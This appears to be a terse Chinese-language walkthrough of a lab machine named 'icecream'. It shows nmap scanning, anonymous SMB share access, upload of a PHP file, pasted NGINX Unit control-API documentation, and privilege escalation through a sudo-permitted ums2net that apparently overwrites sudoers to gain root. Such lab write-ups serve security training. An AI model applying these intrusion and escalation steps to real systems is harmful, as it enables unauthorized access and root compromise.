⚡ root@kali ~ nmap -sP 192.168.56.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 08:06 EST Nmap scan report for 192.168.56.1 Host is up (0.00061s latency). MAC Address: 0A:00:27:00:00:09 (Unknown) Nmap scan report for 192.168.56.2 Host is up (0.00037s latency). MAC Address: 08:00:27:52:72:FB (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.39 Host is up (0.00027s latency). MAC Address: 08:00:27:11:12:1D (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 15.11 seconds
1 2 3 4 5 6 7 8 9 10 11 12
⚡ root@kali ~ nmap -sT -min-rate 10000 -p- 192.168.56.39 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 08:08 EST Nmap scan report for 192.168.56.39 Host is up (0.00042s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 9000/tcp open cslistener MAC Address: 08:00:27:11:12:1D (Oracle VirtualBox virtual NIC)
⚡ root@kali ~ nmap -script=vuln -p 22,80,139,445,9000 192.168.56.39 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 08:14 EST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 192.168.56.39 Host is up (0.00037s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 139/tcp open netbios-ssn 445/tcp open microsoft-ds 9000/tcp open cslistener MAC Address: 08:00:27:11:12:1D (Oracle VirtualBox virtual NIC) Host script results: |_smb-vuln-ms10-054: false |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9] |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9] Nmap done: 1 IP address (1 host up) scanned in 106.09 seconds
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers icecream Disk tmp Folder IPC$ IPC IPC Service (Samba 4.17.12-Debian) nobody Disk Home Directories Reconnecting with SMB1 for workgroup listing. smbXcli_negprot_smb1_done: No compatible protocol selected by server. Protocol negotiation to server 192.168.56.39 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available
但是没有任何有效数据
我们再去看新鲜的9000端口,这似乎是 NGINX Unit 的配置或状态信息。NGINX Unit 是一个轻量级的应用服务器,支持多种编程语言(如 Python、PHP、Perl、Ruby、Java 等),并且可以动态配置,无需重启服务
⚡ root@kali ~/Desktop/test/icecream vim phpinfo.php ⚡ root@kali ~/Desktop/test/icecream smbclient //192.168.56.39/icecream -U anonymous Password for [WORKGROUP\anonymous]: Try "help" to get a list of possible commands. smb: \> put phpinfo.php putting file phpinfo.php as \phpinfo.php (3.9 kb/s) (average 3.9 kb/s)
Suppose you saved a PHP script as /www/helloworld/index.php:
1
<?php echo "Hello, PHP on Unit!"; ?>
To run it on Unit with the unit-php module installed, first set up an application object. Let’s store our first config snippet in a file called config.json:
Saving it as a file isn’t necessary, but can come in handy with larger objects.
Now, PUT it into the /config/applications section of Unit’s control API, usually available by default via a Unix domain socket:
1 2
# curl -X PUT --data-binary @config.json --unix-socket \ /path/to/control.unit.sock http://localhost/config/applications
1 2 3
{ "success": "Reconfiguration done." }
Next, reference the app from a listener object in the /config/listeners section of the API. This time, we pass the config snippet straight from the command line:
(ice:/home/ice) $ sudo -l Matching Defaults entries for ice on icecream: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User ice may run the following commands on icecream: (ALL) NOPASSWD: /usr/sbin/ums2net
Insert the USB Mass Storage. Check /dev/disk/by-id/ for the unique path for that device.
Create a config file base on the above path. Please see the config file format section.
Run “ums2net -c “. ums2net will become a daemon in the background. For debugging please add “-d” option to avoid detach.
Use nc to write your image to the USB Mass Storage device. For example, “nc -N localhost 29543 < warp7.img”
Config file
Each line in the config file maps a TCP port to a device. All the options are separated by space. The first argument is a number represents the TCP port. And the rest of the arguments are in dd-style. For example,
ice@icecream:/tmp$ sudo su - sudo su - /etc/sudoers:2:11: error de sintaxis with the 'visudo'command as root. ^~~~~~~~ id uid=0(root) gid=0(root) grupos=0(root)
